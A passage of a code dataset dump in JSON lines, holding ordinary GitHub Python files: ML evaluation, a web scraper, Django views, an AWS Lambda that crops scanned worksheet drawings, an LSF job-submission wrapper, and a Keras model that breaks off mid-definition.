= np.average(anomaly_score.values)\r\n cutoff_result = cutoff(dataset, fprs, tprs, thres, n_avg, a_avg)\r\n\r\n cutoff_result_df = pd.DataFrame.from_dict(cutoff_result, orient='index').T\r\n os.makedirs(os.path.dirname(accuracy_save), exist_ok=True)\r\n cutoff_result_df.to_csv(accuracy_save, index=False)\r\n # print(cutoff_result)\r\n plot_roc_curve(roc_curve_data, plot_save)\r\n # roc_curve_datas.append[{\"fpr\": fpr, \"tpr\": tpr, \"thres\": thres}]\r\n\r\n\r\ndef arg_parse():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n \"-n\",\r\n \"--normal\",\r\n default=\"output/experiments/score/acanogan/5032AB_normal.csv\",\r\n help=\"Normal data score File\")\r\n parser.add_argument(\r\n \"-a\",\r\n \"--anomaly\",\r\n default=\"output/experiments/score/acanogan/5032AB_anomaly.csv\",\r\n help=\"Anomaly data score File\")\r\n parser.add_argument(\r\n \"-ms\",\r\n \"--roc_save\",\r\n default=\"output/experiments/roc_curve/5032AB.png\",\r\n help=\"File to save the roc curve\")\r\n parser.add_argument(\r\n \"-as\",\r\n \"--accuracy_save\",\r\n default=\"output/experiments/accuracy/5032AB.csv\",\r\n help=\"File to save the roc accuracy\")\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef main():\r\n args = arg_parse()\r\n make_detect_accuracy(\r\n args.normal,\r\n args.anomaly,\r\n args.roc_save,\r\n args.accuracy_save)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"mine1217/acgan_anomaly_detection","sub_path":"src/experiments/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31562083130","text":"def simple():\r\n for i in range(10):\r\n if(i%2==0):\r\n yield i \r\n\r\n#function call using for loop \r\nfor i in simple():\r\n print(i)\r\n\r\nprint(\"\\n multiple yield \\n\" )\r\n\r\ndef abc():\r\n str1=\"first string\"\r\n yield str1\r\n \r\n str2=\"second string\"\r\n yield 
str2\r\n\r\n str3=\"third string\"\r\n yield str3\r\n\r\nb=abc()\r\nprint(next(b))\r\nprint(next(b))\r\nprint(next(b))\r\n","repo_name":"Pournimaprabhune/python","sub_path":"114_generator1.py","file_name":"114_generator1.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24815861783","text":"#!/usr/bin/env python3\n\n\n# 1st-party\nimport collections\nimport csv\nimport json\nimport logging\nimport os\nimport sys\n\n# 2nd-party\nimport package_cache\nimport translation_cache\n\n# Data source 3: A map of a project to the date (not time) of when it last\n# added, updated or removed a package.\nPACKAGE_LAST_MODIFIED_FILENAME = '/var/experiments-output/package_cache.json'\n\n# The time since the hypothetical compromise began (i.e. since the download log\n# began).\nSINCE_TIMESTAMP = 1395360000\n\n\n# this script will traverse the filename in the format of sorted.simple.log\n# and count the instances of every package request that occurred. \ndef sort_packages_by_popularity(filename):\n packages = collections.Counter()\n\n # Zero counters for all projects estimated to exist before compromise.\n with open(PACKAGE_LAST_MODIFIED_FILENAME, 'rt') as fp:\n packages_list = json.load(fp)\n\n for package in packages_list:\n # Get timestamps of when the project added/updated/removed a package.\n timestamps = packages_list[package]\n timestamp = \\\n package_cache.get_last_timestamp_before_compromise(timestamps,\n SINCE_TIMESTAMP)\n\n # This project was updated sometime before compromise.\n # That means this project can be included in the set of projects that\n # existed before compromise, giving us a better estimate of the true\n # number of projects that existed just before compromise.\n if timestamp:\n assert timestamp < SINCE_TIMESTAMP\n packages[package] = 0\n\n logging.info('# of projects estimated to exist before compromise: {:,}'\\\n .format(len(packages)))\n\n # Now count the popularity of packages that were actually downloaded.\n # NOTE: This is extremely biased towards the compromise period, but we have\n # no better data. 
Must note in paper.\n with open(filename, 'rt') as simple_log:\n requests = csv.reader(simple_log)\n\n for timestamp, anonymized_ip, request, user_agent in requests:\n package_name = translation_cache.infer_package_name(request)\n assert package_name\n assert len(package_name) > 0, request\n packages[package_name] += 1\n\n # order the dictionary\n logging.info('total # projects seen to exist after compromise: {:,}'\\\n .format(len(packages)))\n\n with open('/var/experiments-output/packages_by_popularity.txt', 'wt') as \\\n ordered_packages_file:\n for package, count in packages.most_common():\n assert len(package) > 0\n ordered_packages_file.write(\"{},{}\\n\".format(package, count))\n\n\nif __name__ == '__main__':\n # rw for owner and group but not others\n os.umask(0o07)\n\n assert len(sys.argv) == 2\n log_filename = sys.argv[1]\n\n sort_packages_by_popularity(log_filename)\n\n\n","repo_name":"trishankkarthik/diplomat-experiments","sub_path":"packages_by_popularity.py","file_name":"packages_by_popularity.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"6174861477","text":"import requests\nfrom bs4 import BeautifulSoup\n\nkey = {\n 'start':0\n}\nwith open('musicTop250.txt','a+',encoding='utf-8') as f:\n for i in range(10):\n r = requests.get('https://music.douban.com/top250',timeout=20,params=key)\n soup = BeautifulSoup(r.text,\"lxml\")\n \"\"\"\n Document-search method: find() / find_all()\n \"\"\"\n boxs = soup.find_all('div',class_='pl2') \n for box in boxs:\n \"\"\"\n Selector method: select()\n \"\"\"\n album_name = box.select('a:nth-child(1)')[0].text.strip()\n album_info = box.select('p.pl')[0].text.strip()\n album_rating = box.select('span.rating_nums')[0].text.strip()\n f.write('名称:'+ album_name + ' 信息:' + album_info + ' 评分:'+album_rating+'\\n')\n key['start'] = key['start'] + 25\n","repo_name":"BooleanlN/crawlers","sub_path":"chapter1/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9940178285","text":"from django.shortcuts import render, redirect, reverse\nfrom .forms import ArtForm\nfrom django.db import transaction\nfrom .models import Category, Artwork, ArtLike\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth import authenticate\n\n\ndef upload_view(request):\n if request.method == \"POST\":\n form = ArtForm(request.POST, request.FILES, user=request.user)\n if form.is_valid():\n with transaction.atomic():\n form.save()\n return redirect('/')\n else:\n form = ArtForm(user=request.user)\n context = {\n \"form\":form,\n }\n return render(request, 'artworks/upload_art.html', context)\n\n\ndef like_view(request, art_id):\n user = request.user\n if user.is_authenticated:\n artwork = Artwork.objects.get(pk=art_id)\n if artwork.likes.filter(id=user.id).exists():\n artwork.likes.remove(user)\n else:\n artwork.likes.add(user)\n return HttpResponseRedirect(reverse('artworks:art_view', args=(art_id,)))\n return redirect('/login')\n\n\ndef swipe_like_view(request, art_id):\n if request.user.is_authenticated:\n artwork = Artwork.objects.get(pk=art_id)\n artwork.likes.add(request.user)\n return HttpResponseRedirect('/')\n\n\ndef art_view(request, art_id):\n artwork = Artwork.objects.get(pk=art_id)\n liked = artwork.likes.filter(id=request.user.id).exists()\n categories = artwork.category.all()\n context = {\n \"artwork\":artwork,\n \"artist\": artwork.uploader,\n 
\"liked\":liked,\n \"categories\":categories,\n }\n return render(request, 'artworks/art_view.html', context)\n\n","repo_name":"Fiphee/art_web_app","sub_path":"artworks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21397022789","text":"import random\nfrom typing import Dict, Callable\n\n\nclass JobEntrypoint:\n def perform(self, x: float, y: float) -> float:\n \"\"\"\n Add numbers.\n :param x: First element to add.\n :param y: Second element to add.\n :return: Sum of the numbers.\n \"\"\"\n return x + y\n\n def auxiliary_endpoints(self) -> Dict[str, Callable]:\n \"\"\"Dict of custom endpoint paths (besides \"/perform\") handled by Entrypoint methods\"\"\"\n return {\n '/explain': self.explain,\n '/random': self.random,\n }\n\n def explain(self, x: float, y: float) -> Dict[str, float]:\n \"\"\"\n Explain feature importance of a model result.\n :param x: First element to add.\n :param y: Second element to add.\n :return: Dict of feature importance.\n \"\"\"\n result = self.perform(x, y)\n return {'x_importance': x / result, 'y_importance': y / result}\n\n def random(self, start: float, end: float) -> float:\n \"\"\"Return random number within a range\"\"\"\n return random.uniform(start, end)\n\n def docs_input_examples(self) -> Dict[str, Dict]:\n \"\"\"Return mapping of Job's endpoints to corresponding exemplary inputs.\"\"\"\n return {\n '/perform': {\n 'x': 40,\n 'y': 2,\n },\n '/explain': {\n 'x': 1,\n 'y': 2,\n },\n '/random': {\n 'start': 0,\n 'end': 10,\n },\n }\n","repo_name":"TheRacetrack/racetrack","sub_path":"sample/python-auxiliary-endpoints/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"6"} +{"seq_id":"41071023782","text":"#! 
/usr/bin/python2.7\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef histo(dataIn, weights=None, bins=32, range_=(0,256)):\n histo, bins = np.histogram(dataIn, bins, range_, weights=weights)\n #histo = histo/ histo.sum()\n return histo, bins\n\n# Displays a histogram created by numpy\ndef plotHist(dataIn):\n plt.hist(dataIn)\n plt.show()\n\n\n\n# Returns the index of the bin that the color belongs to\ndef bin_please(couleur,bins):\n result = []\n for i,coul in enumerate(couleur):\n tmp = (bins <= coul)*1\n result.append(tmp.sum()-1)\n return result\n \n# Optimized Python version (but which takes more time than the previous one ...)\ndef bin_please_opt(couleur,bins):\n couleur = np.reshape(couleur,(len(couleur),1))\n bins = np.meshgrid(bins,np.arange(couleur.shape[0]))[0]\n lut = (bins <= couleur)*1\n lut = np.dot(lut,np.ones(lut.shape[1]))-1\n return lut\n \ndef bin_RGB(couleur_RGB,bins):\n #couleur_RGB = couleur_RGB.astype(float)\n index_R = bin_please(couleur_RGB[0],bins)\n index_G = bin_please(couleur_RGB[1],bins)\n index_B = bin_please(couleur_RGB[2],bins)\n return [index_R, index_G, index_B] \n\n##############################################################################\n################################ TESTS ############################\n##############################################################################\n\nif __name__ == \"__main__\":\n import time\n \n\n\n \n \n","repo_name":"TheDudesGhost/Tracking","sub_path":"mean_shift/base/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30292158697","text":"#!/usr/bin/env python\n'''\nSnakemake helper script for LSF support\n'''\nimport argparse\nimport subprocess\nimport re\nimport time\nimport pathlib\n\nparser = argparse.ArgumentParser(description=\"Runs bsub but watches to make sure the job is successfully submitted and quits if it doesn't start soon enough.\")\nparser.add_argument(\"--timeout\", help=\"time in seconds to wait until giving up watching for the job to enter RUN state\", default=30, type=int)\nparser.add_argument(\"-M\", \"--memory\", help=\"memory limit in MB\", default=12000, type=int)\nparser.add_argument(\"command\", help=\"command to pass to bsub to run\", nargs=argparse.REMAINDER)\n\nargs = parser.parse_args()\n\nimport random\ntemp_num = random.randint(0, 1_000_000)\ntemp_file = pathlib.Path(f\"log/tsub/tmp.{temp_num}.started\")\ntemp_file.touch()\n\n# Run the command\nwith open(temp_file, \"w\") as temp:\n    command = \"bsub \" + f'-M {args.memory} -R \"rusage [mem={args.memory}]\" '+ ' '.join(args.command)\n    temp.write(\"Running:\\n\")\n    temp.write(command)\n    try:\n        result = subprocess.run(command, shell=True, check=True, stdout=subprocess.PIPE)\n    except subprocess.CalledProcessError as err:\n        temp.write(\"CALLED BSUB COMMAND FAILED\")\n        temp.write(err.stdout.decode())\n        # 'result' is never assigned on this path, so stop here\n        exit(1)\n\nm = re.match(\"Job <([\\d]+)> is submitted to\", result.stdout.decode())\nif m:\n    job_id = m.groups()[0]\n    print(job_id)\n    temp_file.unlink()\n    exit(0)\n    \n    for i in range(args.timeout):\n        time.sleep(1)\n        bjobs_result = subprocess.run(f\"bjobs {job_id}\", shell=True, check=True, stdout=subprocess.PIPE)\n        if bjobs_result.stdout.decode().endswith(\"is not found\"):\n            continue\n        else:\n            lines = bjobs_result.stdout.decode().splitlines()\n            if len(lines) < 2:\n                continue\n\n            _job_id, user, stat, queue, *rest = lines[1].split()\n            if _job_id == job_id:\n                if stat == \"RUN\":\n                    print(job_id)\n
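# only the bare job id goes to stdout so a caller (e.g. Snakemake's cluster wrapper) can capture it; chattier progress messages stay commented out\n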
#print(f\"Job {job_id} started running successfully after {i} seconds\")\n temp_file.unlink()\n exit(0)\n elif stat == \"PEND\":\n print(job_id)\n #print(f\"Job {job_id} queued successfully after {i} seconds\")\n temp_file.unlink()\n exit(0)\n else:\n #print(f\"Job {job_id} in queue with status {stat}\")\n continue\n print(\"Never saw the job in the RUN or PEND state in queue\")\n\n # Can't actually do the following since it bhist needs to be on node\n ## Check bhist in case it did run but finished very quickly\n #bhist_result = subprocess.run(f\"bhist {job_id}\", shell=True, check=True, stdout=subprocess.PIPE)\n #if bhist_result.stdout.decode().startswith(\"No matching job found\"):\n # print(\"No trace of the job to be found in bhist either. Declaring failure to submit\")\n # exit(1)\n #else:\n # lines = bhist_result.stdout.decode().splitlines()\n # if len(lines) < 2:\n # print(\"No trace of the job to be found in bhist either. Declaring failure to submit\")\n # exit(1)\n # else:\n # _job_id, user, name, *rest = lines[1].split()\n # if _job_id == job_id:\n # print(\"Found job in bhist, assuming it successfully started running\")\n # exit(0)\n # else:\n # print(\"No trace of the job to be found in bhist either. Declaring failure to submit\")\n # exit(1)\n\n exit(1)\n\nelse:\n print(\"Failed submission of job\")\n print(result.stdout.decode())\n exit(1)\n","repo_name":"tgbrooks/ukbb","sub_path":"tsub.py","file_name":"tsub.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"41404365846","text":"from __future__ import print_function\nimport traceback\nimport boto3\nimport copy\nimport cv2\nimport numpy as np\nimport json\nimport urllib.parse\nfrom skimage.filters import threshold_yen\nfrom skimage.exposure import rescale_intensity\n\nMAX_MATCHES = 500\nGOOD_MATCH_PERCENT = 0.15\ns3 = boto3.client('s3')\n#dynamodb = boto3.client('dynamodb')\n# This function is triggered by a page being inserted into a bucket.\n# The key of the image is used to pull a template.\ndef perspectiveFixRequest(event, context):\n\n #print(\"Received event: \" + json.dumps(event, indent=2))\n # What we hope to return.\n response = {\n \"success\": False,\n \"message\": \"h.g v2.0!\"\n }\n # Tasks\n # Triggered by S3 upload event to raw_images\n try:\n for record in event['Records']:\n # The S3 bucket\n bucket = record['s3']['bucket']['name']\n \n # Folder format is raw_assets/game/page/uuid. (jpg or jpeg or png)\n key = urllib.parse.unquote_plus( record['s3']['object']['key'], encoding='utf-8' )\n \n # Fetch Image\n page = s3.get_object(Bucket=bucket, Key=key)\n\n # page['Body'] is the image. 
Always .jpg\n # obj to cv2\n nparr = np.frombuffer( page['Body'].read(), np.uint8 )\n image = cv2.imdecode( nparr, cv2.IMREAD_COLOR )\n \n # Split the url into parts so we know where the model lives.\n # 1 is the minigame, 2 is the page, 3 is the uuid\n key_parts = key.split(\"/\")\n minigame = key_parts[1]\n model_id = key_parts[2]\n image_id = key_parts[3].split(\".\")[0]\n\n # Fetch the page model for alignment.\n model_base = minigame + '/' + model_id\n model_bucket = 'humanities.games.page.models'\n page_model = s3.get_object( Bucket=model_bucket, Key=model_base+'.jpg' )\n model_nparr = np.frombuffer( page_model['Body'].read(), np.uint8 )\n model_image = cv2.imdecode( model_nparr, cv2.IMREAD_COLOR )\n\n # Fetch the page data for transforms.\n page_data_file = s3.get_object( Bucket=model_bucket, Key=model_base+'.json' )\n page_data_string = page_data_file[\"Body\"].read().decode('utf-8')\n page_data = json.loads( page_data_string )\n \n\n # Align the page\n aligned_page = align_images( image, model_image )\n aligned_page = white_balance( aligned_page );\n\n # Locate and save the drawings.\n found_art = find_art( aligned_page, page_data, image_id, minigame, model_id, record );\n \n table = boto3.resource('dynamodb').Table('HG_API_PageStatus')\n # Update Dynamo Status to Complete based on UUID TODO.\n table.update_item(\n Key={\n 'SubmissionID': image_id\n },\n UpdateExpression=\"set ProcessStep = :s, FoundArt = :a\",\n ExpressionAttributeValues={\n ':s': \"complete\",\n ':a': found_art\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n print(\"saved to dynamo\")\n\n except Exception:\n # Caught but with error\n errorTrace = traceback.format_exc()\n print(errorTrace)\n finally:\n result = {\n \"statusCode\": 200,\n \"body\": json.dumps(response)\n }\n return result\n\ndef white_balance(img):\n result = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\n avg_a = np.average(result[:, :, 1])\n avg_b = np.average(result[:, :, 2])\n result[:, :, 1] = result[:, :, 1] - ((avg_a - 128) * (result[:, :, 0] / 255.0) * 1.1)\n result[:, :, 2] = result[:, :, 2] - ((avg_b - 128) * (result[:, :, 0] / 255.0) * 1.1)\n result = cv2.cvtColor(result, cv2.COLOR_LAB2BGR)\n return result\n\ndef align_images(im1, im2):\n\n # Convert images to grayscale\n im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n \n # Detect ORB features and compute descriptors.\n orb = cv2.ORB_create(MAX_MATCHES)\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n descriptors1 = np.array(descriptors1)\n descriptors2 = np.array(descriptors2)\n\n # Match features.\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n # Match descriptors.\n matches = matcher.match(descriptors1,descriptors2, None)\n # Sort them in the order of their distance.\n matches = sorted(matches, key = lambda x:x.distance)\n\n # Sort matches by score\n #matches.sort(key=lambda x: x.distance, reverse=False)\n\n # Remove poor matches\n numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\n matches = matches[:numGoodMatches]\n\n # Draw top matches (local use)\n #imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\n #cv2.imwrite(\"hg-matches.jpg\", imMatches)\n \n # Extract location of good matches\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n for i, match in enumerate(matches):\n points1[i, :] = keypoints1[match.queryIdx].pt\n 
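# DMatch.queryIdx indexes keypoints detected in im1; trainIdx indexes the matching keypoints in im2\n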
points2[i, :] = keypoints2[match.trainIdx].pt\n \n # Find homography\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\n\n # Use homography\n height, width, channels = im2.shape\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\n \n return im1Reg\n\ndef parse_transforms( image, block ):\n #transform\n if( block['rotate'] == \"left\" ) :\n image = cv2.rotate( image, cv2.ROTATE_90_COUNTERCLOCKWISE )\n\n if( block['rotate'] == \"right\" ) :\n image = cv2.rotate( image, cv2.ROTATE_90_CLOCKWISE )\n\n #resize\n new_size = ( block['scaleX'], block['scaleY'] )\n resized = cv2.resize( image, new_size, interpolation = cv2.INTER_AREA )\n return resized\n\ndef scale_contour( cnt, scale ):\n M = cv2.moments(cnt)\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n cnt_norm = cnt - [cx, cy]\n cnt_scaled = cnt_norm * scale\n cnt_scaled = cnt_scaled + [cx, cy]\n cnt_scaled = cnt_scaled.astype(np.int32)\n return cnt_scaled\n\ndef remove_paper( image ):\n # add padding\n image = cv2.copyMakeBorder(image,10,10,10,10,cv2.BORDER_CONSTANT,value=[255,255,255])\n # converting image into grayscale image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n # setting threshold of gray image\n _, threshold = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n \n # using a findContours() function\n contours, _ = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n \n i = 0\n largestContourArea = 0\n largestContour = 0\n for cnt in contours:\n # findcontour function detects whole image as shape\n if i == 0:\n i = 1\n continue\n\n contourArea = cv2.contourArea(cnt)\n if( contourArea > largestContourArea):\n largestContour = cnt\n largestContourArea = contourArea\n\n if not isinstance( largestContour, int ):\n mask = np.zeros_like(image) # Create mask where white is what we want, black otherwise\n cv2.drawContours(image=mask, contours=[largestContour], contourIdx=-1, color=(255,255,255), thickness=-1) # Draw filled contour in mask\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n transparent = np.zeros((image.shape[0], image.shape[1], 4), dtype=np.uint8)\n transparent[:,:,0:3] = image\n transparent[:, :, 3] = mask\n\n return transparent\n return image\n\n\ndef find_art( image, page_data, image_id, minigame, model_id, record ):\n\n #Save what is completed to an array\n completed = []\n completed_dict = {}\n #make a gray version\n gray = cv2.cvtColor( image, cv2.COLOR_BGR2GRAY )\n # setting threshold of gray image\n _, threshold = cv2.threshold( gray, 127, 255, cv2.THRESH_BINARY )\n \n # using a findContours() function\n contours, _ = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE )\n \n i = 0\n total = len( page_data['blocks'] )\n # Find the biggest shapes.\n sorted_contours = sorted( contours, key=lambda x: cv2.contourArea(x), reverse=True )\n\n # Stored for later\n bucket = record['s3']['bucket']['name']\n image_key_base = 'processed/'+ minigame + '/' + model_id + '/' + image_id + '/'\n # was 40000 3-21-22\n threshold_area = 5000 #threshold area\n # list for storing names of shapes\n for contour in sorted_contours:\n \n # here we are ignoring first contour because \n # findcontour function detects whole image as shape\n if i == 0:\n i = 1\n continue\n\n # quit if we are done.\n if len(completed_dict) >= total:\n break\n # cv2.approxPolyDP() function to approximate the shape\n approx = cv2.approxPolyDP(\n contour, 0.01 * cv2.arcLength(contour, True), True)\n \n area = cv2.contourArea(contour)\n # Catch the biggest squares\n print( 
str(len(completed_dict)) + \" of \" + str(total) )\n if ( len(approx) == 4 ) and (area > threshold_area) and ( len(completed_dict) < total ):\n # use a point from page_data to determine which block \n file_name = 'not-found'\n #see which contour \n for block in page_data['blocks']:\n #is our known point inside the found box?\n result = cv2.pointPolygonTest(contour, ( block['centerX'], block['centerY'] ), False)\n if result > 0 :\n newBlock = copy.deepcopy( block )\n file_name = newBlock['file_name']\n print( file_name + \" found.\" )\n # page_data['blocks'][ index ]['found'] = True;\n # Scale the contour to try to remove the black border.\n # .933 was the original working param here.\n cnt = scale_contour( contour, .933 )\n x,y,w,h = cv2.boundingRect( cnt )\n cropped = image[y:y+h, x:x+w]\n if block['make_transparent'] == True:\n # format for js\n newBlock['make_transparent'] = 'true'\n # remove the paper\n cropped = remove_paper( cropped )\n final = parse_transforms( cropped, newBlock )\n not_empty, rect = check_not_empty( final, file_name )\n if not_empty == True :\n # save to s3. The rect is for use with collision detection.\n image_string = cv2.imencode( '.png', final, [int(cv2.IMWRITE_PNG_COMPRESSION),9] )[1].tostring()\n s3.put_object(Bucket=bucket, Key=image_key_base + file_name + '.png', Body=image_string)\n newBlock[ 'bounds' ] = rect\n completed_dict[ file_name ] = newBlock;\n #completed.append( json.dumps( newBlock, separators=(',', ':') ) )\n else:\n # format for js\n newBlock['make_transparent'] = 'false'\n # No transparency, let us save on file size\n final = parse_transforms( cropped, newBlock )\n not_empty, rect = check_not_empty( final, file_name )\n if not_empty == True :\n # save to s3. We disregard the rect for jpg\n image_string = cv2.imencode( '.jpg', final, [cv2.IMWRITE_JPEG_QUALITY, 90] )[1].tostring()\n s3.put_object(Bucket=bucket, Key=image_key_base + file_name + '.jpg', Body=image_string)\n completed_dict[ file_name ] = newBlock;\n #completed.append( json.dumps( newBlock, separators=(',', ':') ) )\n # Theoretically it takes the smallest match.\n for key in completed_dict:\n completed.append( json.dumps( completed_dict[ key ], separators=(',', ':') ) )\n return completed\n\ndef check_not_empty( image, file_name ):\n #make a gray version\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # setting threshold of gray image\n _, threshold = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n \n # using a findContours() function\n contours, _ = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Small pencil marks etc TODO may require scale checking if not empty\n threshold_area = 1000 \n real_image = False\n\n if len(contours) <= 1 :\n # 1 is the whole image, so this is functionally blank.\n print( file_name + \" is blank.\" )\n return False, {}\n else:\n # At least two, so something is in the box.\n largest_mark = sorted( contours, key=lambda x: cv2.contourArea(x), reverse=True )[ 1 ]\n area = cv2.contourArea( largest_mark )\n\n # Check if it is a big enough mark\n if area < threshold_area:\n print( file_name + \"- drawing too small.\" )\n return False, {}\n # big enough, return bounding rect as array for collision detection \n x,y,w,h = cv2.boundingRect( largest_mark )\n rect = { \"x\" : x, \"y\" : y, \"width\" : w, \"height\": h }\n return True, rect\n\ndef brightness_and_contrast( image, gray ):\n\n clip_hist_percent = 1\n # Calculate grayscale histogram\n hist = cv2.calcHist([gray],[0],None,[256],[0,256])\n hist_size = len(hist)\n\n # 
Calculate cumulative distribution from the histogram\n accumulator = []\n accumulator.append(float(hist[0]))\n for index in range(1, hist_size):\n accumulator.append(accumulator[index -1] + float(hist[index]))\n\n # Locate points to clip\n maximum = accumulator[-1]\n clip_hist_percent *= (maximum/100.0)\n clip_hist_percent /= 2.0\n\n # Locate left cut\n minimum_gray = 0\n while accumulator[minimum_gray] < clip_hist_percent:\n minimum_gray += 1\n\n # Locate right cut\n maximum_gray = hist_size -1\n while accumulator[maximum_gray] >= (maximum - clip_hist_percent):\n maximum_gray -= 1\n\n # Calculate alpha and beta values\n alpha = 255 / (maximum_gray - minimum_gray)\n beta = -minimum_gray * alpha\n\n # Creates whiter background\n auto_result = cv2.convertScaleAbs(image, alpha=alpha, beta=beta)\n\n return auto_result\n\n\n \n\n","repo_name":"spark-media/humanities-games-paper-packet-api","sub_path":"page-process-aws-container/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73491922108","text":"class Solution:\n def productExceptSelf(self, nums):\n prod = 1\n l = len(nums)\n output = [None] * l\n\n for i, n in enumerate(nums):\n output[i] = prod\n prod *= n\n\n prod = 1\n for i in range(l):\n output[l-1-i] = output[l-1-i] * prod\n prod = prod * nums[l-1-i]\n\n return output\n \n\ns = Solution()\nprint(s.productExceptSelf([0, 1]))\n\n","repo_name":"ishmam-hossain/problem-solving","sub_path":"leetcode/238_product_array_except_self.py","file_name":"238_product_array_except_self.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"41027375725","text":"from training import training, setting, w2v\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.9\nset_session(tf.Session(config=config))\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.models import *\n\nquest_input = Input(shape=(setting.query_len,), dtype='int32', name='quest_word_input')\ncand_input = Input(shape=(setting.passage_len,), dtype='int32', name='passage_word_input')\n\nquestC_input = Input(shape=(setting.query_len, setting.word_len), dtype='int32', name='quest_char_input')\ncandC_input = Input(shape=(setting.passage_len, setting.word_len), dtype='int32', name='passage_char_input')\n\nquestA_input = Input(shape=(setting.query_len, 2), name='quest_word_feature_input')\ncandA_input = Input(shape=(setting.passage_len, 4), name='passage_word_feature_input')\n\nquestAc_input = Input(shape=(setting.query_len, setting.word_len, 1), name='quest_char_feature_input')\ncandAc_input = Input(shape=(setting.passage_len, setting.word_len, 1), name='passage_char_feature_input')\n\n\ndef MaskWord(x, dropout=0.2):\n # Mask to 1\n mask = K.cast(K.random_uniform(K.shape(x)) < dropout, 'float32')\n mask = K.cast(K.not_equal(x, 0), 'float32') * mask\n xm = K.cast(x, 'float32') * (1 - mask) + mask\n return K.in_train_phase(K.cast(xm, 'int32'), K.cast(x, 'int32'))\n\n\nMaskWordLayer = Lambda(MaskWord)\n\nqi = MaskWordLayer(quest_input)\nci = MaskWordLayer(cand_input)\nqci = MaskWordLayer(questC_input)\ncci = MaskWordLayer(candC_input)\n\n\nembed_layer = Embedding(setting.nwords, setting.w_emb_size, weights=[w2v], trainable=True)\nquest_emb = Dropout(setting.dropout_rate, (None, 1, None))( 
embed_layer(quest_input) )\ncand_emb = Dropout(setting.dropout_rate, (None, 1, None))( embed_layer(cand_input) )\n\ncembed_layer = Embedding(setting.nchars + 2, setting.c_emb_size)\n\n\nchar_input = Input(shape=(setting.word_len,), dtype='int32')\nc_emb = Dropout(setting.dropout_rate, (None, 1, None))( cembed_layer(char_input) )\ncmask = Lambda(lambda x:K.cast(K.not_equal(x, 0), 'float32'))(char_input)\ncc = Conv1D(setting.c_emb_size, 3, padding='same')(c_emb)\ncc = LeakyReLU()(cc)\ncc = multiply([cc, Reshape((-1,1))(cmask)])\ncc = Lambda(lambda x:K.sum(x, 1))(cc)\nchar_model = Model(char_input, cc)\n\nqc_emb = TimeDistributed(char_model)(qci)\ncc_emb = TimeDistributed(char_model)(cci)\n\nquest_emb = concatenate([quest_emb, qc_emb, questA_input])\ncand_emb = concatenate([cand_emb, cc_emb, candA_input])\n\nquest_emb = Dense(128, activation='relu')(quest_emb)\ncand_emb = Dense(128, activation='relu')(cand_emb)\n\n\nclass Highway:\n def __init__(self, dim, layers=2):\n self.linears = [Dense(dim, activation='relu') for _ in range(layers+1)]\n self.gates = [Dense(dim, activation='sigmoid') for _ in range(layers)]\n def __call__(self, x):\n for linear, gate in zip(self.linears, self.gates):\n g = gate(x)\n z = linear(x)\n x = Lambda(lambda x:x[0]*x[1]+(1-x[0])*x[2])([g, z, 